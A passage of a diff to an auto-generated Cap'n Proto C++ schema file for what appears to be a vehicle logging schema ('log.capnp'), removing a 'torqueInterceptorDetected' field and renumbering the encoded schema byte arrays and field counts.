0, 0, 3, 0, 1, 0, + 96, 4, 0, 0, 2, 0, 1, 0, 5, 0, 0, 0, 5, 0, 0, 0, 0, 0, 1, 0, 10, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 121, 4, 0, 0, 82, 0, 0, 0, + 93, 4, 0, 0, 82, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 120, 4, 0, 0, 3, 0, 1, 0, - 132, 4, 0, 0, 2, 0, 1, 0, - 34, 0, 0, 0, 12, 0, 0, 0, + 92, 4, 0, 0, 3, 0, 1, 0, + 104, 4, 0, 0, 2, 0, 1, 0, + 33, 0, 0, 0, 12, 0, 0, 0, 0, 0, 1, 0, 11, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 129, 4, 0, 0, 178, 0, 0, 0, + 101, 4, 0, 0, 178, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 132, 4, 0, 0, 3, 0, 1, 0, - 144, 4, 0, 0, 2, 0, 1, 0, - 35, 0, 0, 0, 13, 0, 0, 0, + 104, 4, 0, 0, 3, 0, 1, 0, + 116, 4, 0, 0, 2, 0, 1, 0, + 34, 0, 0, 0, 13, 0, 0, 0, 0, 0, 1, 0, 12, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 141, 4, 0, 0, 186, 0, 0, 0, + 113, 4, 0, 0, 186, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 144, 4, 0, 0, 3, 0, 1, 0, - 156, 4, 0, 0, 2, 0, 1, 0, + 116, 4, 0, 0, 3, 0, 1, 0, + 128, 4, 0, 0, 2, 0, 1, 0, 6, 0, 0, 0, 69, 0, 0, 0, 0, 0, 1, 0, 13, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 153, 4, 0, 0, 98, 0, 0, 0, + 125, 4, 0, 0, 98, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 152, 4, 0, 0, 3, 0, 1, 0, - 164, 4, 0, 0, 2, 0, 1, 0, + 124, 4, 0, 0, 3, 0, 1, 0, + 136, 4, 0, 0, 2, 0, 1, 0, 25, 0, 0, 0, 14, 0, 0, 0, 0, 0, 1, 0, 14, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 161, 4, 0, 0, 98, 0, 0, 0, + 133, 4, 0, 0, 98, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 160, 4, 0, 0, 3, 0, 1, 0, - 172, 4, 0, 0, 2, 0, 1, 0, + 132, 4, 0, 0, 3, 0, 1, 0, + 144, 4, 0, 0, 2, 0, 1, 0, 7, 0, 0, 0, 15, 0, 0, 0, 0, 0, 1, 0, 15, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 169, 4, 0, 0, 98, 0, 0, 0, + 141, 4, 0, 0, 98, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 168, 4, 0, 0, 3, 0, 1, 0, - 180, 4, 0, 0, 2, 0, 1, 0, + 140, 4, 0, 0, 3, 0, 1, 0, + 152, 4, 0, 0, 2, 0, 1, 0, 8, 0, 0, 0, 70, 0, 0, 0, 0, 0, 1, 0, 16, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 177, 4, 0, 0, 138, 0, 0, 0, + 149, 4, 0, 0, 138, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 180, 4, 0, 0, 3, 0, 1, 0, - 192, 4, 0, 0, 2, 0, 1, 0, + 152, 4, 0, 0, 3, 0, 1, 0, + 164, 4, 0, 0, 2, 0, 1, 0, 9, 0, 0, 0, 8, 0, 0, 0, 0, 0, 1, 0, 17, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 189, 4, 0, 0, 58, 0, 0, 0, + 161, 4, 0, 0, 58, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 184, 4, 0, 0, 3, 0, 1, 0, - 196, 4, 0, 0, 2, 0, 1, 0, + 156, 4, 0, 0, 3, 0, 1, 0, + 168, 4, 0, 0, 2, 0, 1, 0, 10, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 18, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 193, 4, 0, 0, 58, 0, 0, 0, + 165, 4, 0, 0, 58, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 188, 4, 0, 0, 3, 0, 1, 0, - 216, 4, 0, 0, 2, 0, 1, 0, + 160, 4, 0, 0, 3, 0, 1, 0, + 188, 4, 0, 0, 2, 0, 1, 0, 23, 0, 0, 0, 9, 0, 0, 0, 0, 0, 1, 0, 19, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 213, 4, 0, 0, 130, 0, 0, 0, + 185, 4, 0, 0, 130, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 184, 4, 0, 0, 3, 0, 1, 0, + 196, 4, 0, 0, 2, 0, 1, 0, + 35, 0, 0, 0, 20, 0, 0, 0, + 0, 0, 1, 0, 20, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 193, 4, 0, 0, 178, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 196, 4, 0, 0, 3, 0, 1, 0, + 208, 4, 0, 0, 2, 0, 1, 0, + 16, 0, 0, 0, 21, 0, 0, 0, + 0, 0, 1, 0, 21, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 205, 4, 0, 0, 114, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 204, 4, 0, 0, 3, 0, 1, 0, + 216, 4, 0, 0, 2, 0, 1, 0, + 11, 0, 0, 0, 71, 0, 0, 0, + 0, 0, 1, 0, 22, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 213, 4, 0, 0, 114, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 212, 4, 0, 0, 3, 0, 1, 0, 224, 4, 0, 0, 2, 0, 1, 0, - 36, 0, 0, 0, 20, 0, 0, 0, - 0, 0, 1, 0, 20, 0, 0, 0, + 27, 0, 0, 0, 22, 0, 0, 0, + 0, 0, 1, 0, 23, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 221, 4, 0, 0, 178, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 224, 4, 0, 0, 3, 0, 1, 0, 236, 4, 0, 0, 2, 0, 1, 0, - 16, 0, 0, 0, 21, 0, 0, 0, - 0, 0, 1, 0, 21, 0, 0, 0, + 24, 0, 0, 0, 12, 0, 0, 0, + 0, 0, 1, 0, 24, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 233, 4, 0, 0, 114, 0, 0, 0, + 233, 4, 0, 0, 130, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 232, 4, 0, 0, 3, 0, 1, 0, 244, 4, 0, 0, 2, 0, 1, 0, - 11, 0, 0, 0, 71, 0, 0, 0, - 0, 0, 1, 0, 22, 0, 0, 0, + 12, 0, 0, 0, 13, 0, 0, 0, + 0, 0, 1, 0, 25, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 241, 4, 0, 0, 114, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 240, 4, 0, 0, 3, 0, 1, 0, 252, 4, 0, 0, 2, 0, 1, 0, - 27, 0, 0, 0, 22, 0, 0, 0, - 0, 0, 1, 0, 23, 0, 0, 0, + 36, 0, 0, 0, 14, 0, 0, 0, + 0, 0, 1, 0, 26, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 249, 4, 0, 0, 178, 0, 0, 0, + 249, 4, 0, 0, 186, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 252, 4, 0, 0, 3, 0, 1, 0, 8, 5, 0, 0, 2, 0, 1, 0, - 24, 0, 0, 0, 12, 0, 0, 0, - 0, 0, 1, 0, 24, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 5, 5, 0, 0, 130, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 4, 5, 0, 0, 3, 0, 1, 0, - 16, 5, 0, 0, 2, 0, 1, 0, - 12, 0, 0, 0, 13, 0, 0, 0, - 0, 0, 1, 0, 25, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 13, 5, 0, 0, 114, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 12, 5, 0, 0, 3, 0, 1, 0, - 24, 5, 0, 0, 2, 0, 1, 0, - 37, 0, 0, 0, 14, 0, 0, 0, - 0, 0, 1, 0, 26, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 21, 5, 0, 0, 186, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 24, 5, 0, 0, 3, 0, 1, 0, - 36, 5, 0, 0, 2, 0, 1, 0, 26, 0, 0, 0, 23, 0, 0, 0, 0, 0, 1, 0, 27, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 33, 5, 0, 0, 98, 0, 0, 0, + 5, 5, 0, 0, 98, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 32, 5, 0, 0, 3, 0, 1, 0, - 44, 5, 0, 0, 2, 0, 1, 0, + 4, 5, 0, 0, 3, 0, 1, 0, + 16, 5, 0, 0, 2, 0, 1, 0, 13, 0, 0, 0, 9, 0, 0, 0, 0, 0, 1, 0, 28, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 41, 5, 0, 0, 74, 0, 0, 0, + 13, 5, 0, 0, 74, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 40, 5, 0, 0, 3, 0, 1, 0, - 52, 5, 0, 0, 2, 0, 1, 0, + 12, 5, 0, 0, 3, 0, 1, 0, + 24, 5, 0, 0, 2, 0, 1, 0, 19, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 29, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 49, 5, 0, 0, 82, 0, 0, 0, + 21, 5, 0, 0, 82, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 48, 5, 0, 0, 3, 0, 1, 0, - 60, 5, 0, 0, 2, 0, 1, 0, + 20, 5, 0, 0, 3, 0, 1, 0, + 32, 5, 0, 0, 2, 0, 1, 0, 20, 0, 0, 0, 2, 0, 0, 0, 0, 0, 1, 0, 30, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 57, 5, 0, 0, 82, 0, 0, 0, + 29, 5, 0, 0, 82, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 56, 5, 0, 0, 3, 0, 1, 0, - 68, 5, 0, 0, 2, 0, 1, 0, + 28, 5, 0, 0, 3, 0, 1, 0, + 40, 5, 0, 0, 2, 0, 1, 0, 21, 0, 0, 0, 3, 0, 0, 0, 0, 0, 1, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 65, 5, 0, 0, 82, 0, 0, 0, + 37, 5, 0, 0, 82, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 64, 5, 0, 0, 3, 0, 1, 0, - 76, 5, 0, 0, 2, 0, 1, 0, + 36, 5, 0, 0, 3, 0, 1, 0, + 48, 5, 0, 0, 2, 0, 1, 0, 28, 0, 0, 0, 224, 1, 0, 0, 0, 0, 1, 0, 32, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 73, 5, 0, 0, 178, 0, 0, 0, + 45, 5, 0, 0, 178, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 76, 5, 0, 0, 3, 0, 1, 0, - 88, 5, 0, 0, 2, 0, 1, 0, + 48, 5, 0, 0, 3, 0, 1, 0, + 60, 5, 0, 0, 2, 0, 1, 0, 15, 0, 0, 0, 31, 0, 0, 0, 0, 0, 1, 0, 33, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 85, 5, 0, 0, 178, 0, 0, 0, + 57, 5, 0, 0, 178, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 88, 5, 0, 0, 3, 0, 1, 0, - 100, 5, 0, 0, 2, 0, 1, 0, + 60, 5, 0, 0, 3, 0, 1, 0, + 72, 5, 0, 0, 2, 0, 1, 0, 14, 0, 0, 0, 61, 0, 0, 0, 0, 0, 1, 0, 34, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 97, 5, 0, 0, 114, 0, 0, 0, + 69, 5, 0, 0, 114, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 96, 5, 0, 0, 3, 0, 1, 0, - 108, 5, 0, 0, 2, 0, 1, 0, + 68, 5, 0, 0, 3, 0, 1, 0, + 80, 5, 0, 0, 2, 0, 1, 0, 17, 0, 0, 0, 16, 0, 0, 0, 0, 0, 1, 0, 35, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 105, 5, 0, 0, 98, 0, 0, 0, + 77, 5, 0, 0, 98, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 104, 5, 0, 0, 3, 0, 1, 0, - 116, 5, 0, 0, 2, 0, 1, 0, + 76, 5, 0, 0, 3, 0, 1, 0, + 88, 5, 0, 0, 2, 0, 1, 0, 18, 0, 0, 0, 17, 0, 0, 0, 0, 0, 1, 0, 36, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 113, 5, 0, 0, 98, 0, 0, 0, + 85, 5, 0, 0, 98, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 112, 5, 0, 0, 3, 0, 1, 0, - 124, 5, 0, 0, 2, 0, 1, 0, - 29, 0, 0, 0, 225, 1, 0, 0, - 0, 0, 1, 0, 37, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 121, 5, 0, 0, 210, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 128, 5, 0, 0, 3, 0, 1, 0, - 140, 5, 0, 0, 2, 0, 1, 0, + 84, 5, 0, 0, 3, 0, 1, 0, + 96, 5, 0, 0, 2, 0, 1, 0, 118, 111, 108, 116, 97, 103, 101, 0, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, @@ -5251,17 +5244,6 @@ static const ::capnp::_::AlignedData<661> b_a7649e2575e4591e = { 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 10, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 116, 111, 114, 113, 117, 101, 73, 110, - 116, 101, 114, 99, 101, 112, 116, 111, - 114, 68, 101, 116, 101, 99, 116, 101, - 100, 0, 0, 0, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, } }; @@ -5276,11 +5258,11 @@ static const ::capnp::_::RawSchema* const d_a7649e2575e4591e[] = { &s_f69a3ed1e8c081bf, &s_f8d2972deb0cd45c, }; -static const uint16_t m_a7649e2575e4591e[] = {23, 29, 30, 31, 3, 1, 28, 11, 34, 15, 18, 4, 9, 21, 6, 22, 13, 2, 25, 10, 16, 7, 14, 27, 26, 20, 32, 19, 24, 35, 36, 33, 5, 37, 8, 17, 12, 0}; -static const uint16_t i_a7649e2575e4591e[] = {0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37}; +static const uint16_t m_a7649e2575e4591e[] = {23, 29, 30, 31, 3, 1, 28, 11, 34, 15, 18, 4, 9, 21, 6, 22, 13, 2, 25, 10, 16, 7, 14, 27, 26, 20, 32, 19, 24, 35, 36, 33, 5, 8, 17, 12, 0}; +static const uint16_t i_a7649e2575e4591e[] = {0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36}; const ::capnp::_::RawSchema s_a7649e2575e4591e = { - 0xa7649e2575e4591e, b_a7649e2575e4591e.words, 661, d_a7649e2575e4591e, m_a7649e2575e4591e, - 7, 38, i_a7649e2575e4591e, nullptr, nullptr, { &s_a7649e2575e4591e, nullptr, nullptr, 0, 0, nullptr } + 0xa7649e2575e4591e, b_a7649e2575e4591e.words, 643, d_a7649e2575e4591e, m_a7649e2575e4591e, + 7, 37, i_a7649e2575e4591e, nullptr, nullptr, { &s_a7649e2575e4591e, nullptr, nullptr, 0, 0, nullptr } }; #endif // !CAPNP_LITE static const ::capnp::_::AlignedData<33> b_f2fd0b8b0ac9adbb = { @@ -7337,7 +7319,7 @@ const ::capnp::_::RawSchema s_8faa644732dec251 = { 0, 10, i_8faa644732dec251, nullptr, nullptr, { &s_8faa644732dec251, nullptr, nullptr, 0, 0, nullptr } }; #endif // !CAPNP_LITE -static const ::capnp::_::AlignedData<1072> b_97ff69c53601abf1 = { +static const ::capnp::_::AlignedData<1055> b_97ff69c53601abf1 = { { 0, 0, 0, 0, 5, 0, 6, 0, 241, 171, 1, 54, 197, 105, 255, 151, 10, 0, 0, 0, 1, 0, 24, 0, @@ -7347,7 +7329,7 @@ static const ::capnp::_::AlignedData<1072> b_97ff69c53601abf1 = { 21, 0, 0, 0, 194, 0, 0, 0, 29, 0, 0, 0, 167, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 205, 0, 0, 0, 95, 13, 0, 0, + 205, 0, 0, 0, 39, 13, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 108, 111, 103, 46, 99, 97, 112, 110, @@ -7399,434 +7381,427 @@ static const ::capnp::_::AlignedData<1072> b_97ff69c53601abf1 = { 76, 97, 116, 101, 114, 97, 108, 68, 101, 98, 117, 103, 83, 116, 97, 116, 101, 0, 0, 0, 0, 0, 0, 0, - 244, 0, 0, 0, 3, 0, 4, 0, - 32, 0, 0, 0, 0, 0, 0, 0, + 240, 0, 0, 0, 3, 0, 4, 0, + 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 157, 6, 0, 0, 122, 0, 0, 0, + 129, 6, 0, 0, 122, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 156, 6, 0, 0, 3, 0, 1, 0, - 168, 6, 0, 0, 2, 0, 1, 0, - 34, 0, 0, 0, 1, 0, 0, 0, + 128, 6, 0, 0, 3, 0, 1, 0, + 140, 6, 0, 0, 2, 0, 1, 0, + 33, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 165, 6, 0, 0, 122, 0, 0, 0, + 137, 6, 0, 0, 122, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 164, 6, 0, 0, 3, 0, 1, 0, - 176, 6, 0, 0, 2, 0, 1, 0, + 136, 6, 0, 0, 3, 0, 1, 0, + 148, 6, 0, 0, 2, 0, 1, 0, 8, 0, 0, 0, 2, 0, 0, 0, 0, 0, 1, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 173, 6, 0, 0, 42, 0, 0, 0, + 145, 6, 0, 0, 42, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 168, 6, 0, 0, 3, 0, 1, 0, - 180, 6, 0, 0, 2, 0, 1, 0, + 140, 6, 0, 0, 3, 0, 1, 0, + 152, 6, 0, 0, 2, 0, 1, 0, 9, 0, 0, 0, 3, 0, 0, 0, 0, 0, 1, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 177, 6, 0, 0, 98, 0, 0, 0, + 149, 6, 0, 0, 98, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 176, 6, 0, 0, 3, 0, 1, 0, - 188, 6, 0, 0, 2, 0, 1, 0, + 148, 6, 0, 0, 3, 0, 1, 0, + 160, 6, 0, 0, 2, 0, 1, 0, 12, 0, 0, 0, 4, 0, 0, 0, 0, 0, 1, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 185, 6, 0, 0, 90, 0, 0, 0, + 157, 6, 0, 0, 90, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 184, 6, 0, 0, 3, 0, 1, 0, - 196, 6, 0, 0, 2, 0, 1, 0, + 156, 6, 0, 0, 3, 0, 1, 0, + 168, 6, 0, 0, 2, 0, 1, 0, 13, 0, 0, 0, 5, 0, 0, 0, 0, 0, 1, 0, 5, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 193, 6, 0, 0, 90, 0, 0, 0, + 165, 6, 0, 0, 90, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 192, 6, 0, 0, 3, 0, 1, 0, - 204, 6, 0, 0, 2, 0, 1, 0, - 38, 0, 0, 0, 6, 0, 0, 0, + 164, 6, 0, 0, 3, 0, 1, 0, + 176, 6, 0, 0, 2, 0, 1, 0, + 37, 0, 0, 0, 6, 0, 0, 0, 0, 0, 1, 0, 6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 201, 6, 0, 0, 146, 0, 0, 0, + 173, 6, 0, 0, 146, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 204, 6, 0, 0, 3, 0, 1, 0, - 216, 6, 0, 0, 2, 0, 1, 0, - 39, 0, 0, 0, 7, 0, 0, 0, + 176, 6, 0, 0, 3, 0, 1, 0, + 188, 6, 0, 0, 2, 0, 1, 0, + 38, 0, 0, 0, 7, 0, 0, 0, 0, 0, 1, 0, 7, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 213, 6, 0, 0, 122, 0, 0, 0, + 185, 6, 0, 0, 122, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 212, 6, 0, 0, 3, 0, 1, 0, - 224, 6, 0, 0, 2, 0, 1, 0, - 40, 0, 0, 0, 8, 0, 0, 0, + 184, 6, 0, 0, 3, 0, 1, 0, + 196, 6, 0, 0, 2, 0, 1, 0, + 39, 0, 0, 0, 8, 0, 0, 0, 0, 0, 1, 0, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 221, 6, 0, 0, 146, 0, 0, 0, + 193, 6, 0, 0, 146, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 224, 6, 0, 0, 3, 0, 1, 0, - 236, 6, 0, 0, 2, 0, 1, 0, - 41, 0, 0, 0, 9, 0, 0, 0, + 196, 6, 0, 0, 3, 0, 1, 0, + 208, 6, 0, 0, 2, 0, 1, 0, + 40, 0, 0, 0, 9, 0, 0, 0, 0, 0, 1, 0, 9, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 233, 6, 0, 0, 146, 0, 0, 0, + 205, 6, 0, 0, 146, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 236, 6, 0, 0, 3, 0, 1, 0, - 248, 6, 0, 0, 2, 0, 1, 0, - 43, 0, 0, 0, 10, 0, 0, 0, + 208, 6, 0, 0, 3, 0, 1, 0, + 220, 6, 0, 0, 2, 0, 1, 0, + 42, 0, 0, 0, 10, 0, 0, 0, 0, 0, 1, 0, 10, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 245, 6, 0, 0, 170, 0, 0, 0, + 217, 6, 0, 0, 170, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 248, 6, 0, 0, 3, 0, 1, 0, - 4, 7, 0, 0, 2, 0, 1, 0, - 44, 0, 0, 0, 11, 0, 0, 0, + 220, 6, 0, 0, 3, 0, 1, 0, + 232, 6, 0, 0, 2, 0, 1, 0, + 43, 0, 0, 0, 11, 0, 0, 0, 0, 0, 1, 0, 11, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 1, 7, 0, 0, 170, 0, 0, 0, + 229, 6, 0, 0, 170, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 4, 7, 0, 0, 3, 0, 1, 0, - 16, 7, 0, 0, 2, 0, 1, 0, - 57, 0, 0, 0, 12, 0, 0, 0, + 232, 6, 0, 0, 3, 0, 1, 0, + 244, 6, 0, 0, 2, 0, 1, 0, + 56, 0, 0, 0, 12, 0, 0, 0, 0, 0, 1, 0, 12, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 13, 7, 0, 0, 170, 0, 0, 0, + 241, 6, 0, 0, 170, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 16, 7, 0, 0, 3, 0, 1, 0, - 28, 7, 0, 0, 2, 0, 1, 0, - 54, 0, 0, 0, 13, 0, 0, 0, + 244, 6, 0, 0, 3, 0, 1, 0, + 0, 7, 0, 0, 2, 0, 1, 0, + 53, 0, 0, 0, 13, 0, 0, 0, 0, 0, 1, 0, 13, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 25, 7, 0, 0, 178, 0, 0, 0, + 253, 6, 0, 0, 178, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 28, 7, 0, 0, 3, 0, 1, 0, - 40, 7, 0, 0, 2, 0, 1, 0, - 47, 0, 0, 0, 14, 0, 0, 0, + 0, 7, 0, 0, 3, 0, 1, 0, + 12, 7, 0, 0, 2, 0, 1, 0, + 46, 0, 0, 0, 14, 0, 0, 0, 0, 0, 1, 0, 14, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 37, 7, 0, 0, 146, 0, 0, 0, + 9, 7, 0, 0, 146, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 40, 7, 0, 0, 3, 0, 1, 0, - 52, 7, 0, 0, 2, 0, 1, 0, + 12, 7, 0, 0, 3, 0, 1, 0, + 24, 7, 0, 0, 2, 0, 1, 0, 28, 0, 0, 0, 15, 0, 0, 0, 0, 0, 1, 0, 15, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 49, 7, 0, 0, 74, 0, 0, 0, + 21, 7, 0, 0, 74, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 20, 7, 0, 0, 3, 0, 1, 0, + 32, 7, 0, 0, 2, 0, 1, 0, + 34, 0, 0, 0, 8, 0, 0, 0, + 0, 0, 1, 0, 16, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 29, 7, 0, 0, 178, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 32, 7, 0, 0, 3, 0, 1, 0, + 44, 7, 0, 0, 2, 0, 1, 0, + 35, 0, 0, 0, 9, 0, 0, 0, + 0, 0, 1, 0, 17, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 41, 7, 0, 0, 234, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 48, 7, 0, 0, 3, 0, 1, 0, 60, 7, 0, 0, 2, 0, 1, 0, - 35, 0, 0, 0, 8, 0, 0, 0, - 0, 0, 1, 0, 16, 0, 0, 0, + 36, 0, 0, 0, 10, 0, 0, 0, + 0, 0, 1, 0, 18, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 57, 7, 0, 0, 178, 0, 0, 0, + 57, 7, 0, 0, 170, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 60, 7, 0, 0, 3, 0, 1, 0, 72, 7, 0, 0, 2, 0, 1, 0, - 36, 0, 0, 0, 9, 0, 0, 0, - 0, 0, 1, 0, 17, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 69, 7, 0, 0, 234, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 76, 7, 0, 0, 3, 0, 1, 0, - 88, 7, 0, 0, 2, 0, 1, 0, - 37, 0, 0, 0, 10, 0, 0, 0, - 0, 0, 1, 0, 18, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 85, 7, 0, 0, 170, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 88, 7, 0, 0, 3, 0, 1, 0, - 100, 7, 0, 0, 2, 0, 1, 0, 4, 0, 0, 0, 192, 2, 0, 0, 0, 0, 1, 0, 19, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 97, 7, 0, 0, 66, 0, 0, 0, + 69, 7, 0, 0, 66, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 92, 7, 0, 0, 3, 0, 1, 0, - 104, 7, 0, 0, 2, 0, 1, 0, - 58, 0, 0, 0, 193, 2, 0, 0, + 64, 7, 0, 0, 3, 0, 1, 0, + 76, 7, 0, 0, 2, 0, 1, 0, + 57, 0, 0, 0, 193, 2, 0, 0, 0, 0, 1, 0, 20, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 101, 7, 0, 0, 194, 0, 0, 0, + 73, 7, 0, 0, 194, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 104, 7, 0, 0, 3, 0, 1, 0, - 116, 7, 0, 0, 2, 0, 1, 0, - 60, 0, 0, 0, 0, 0, 0, 0, + 76, 7, 0, 0, 3, 0, 1, 0, + 88, 7, 0, 0, 2, 0, 1, 0, + 59, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 21, 0, 0, 0, 0, 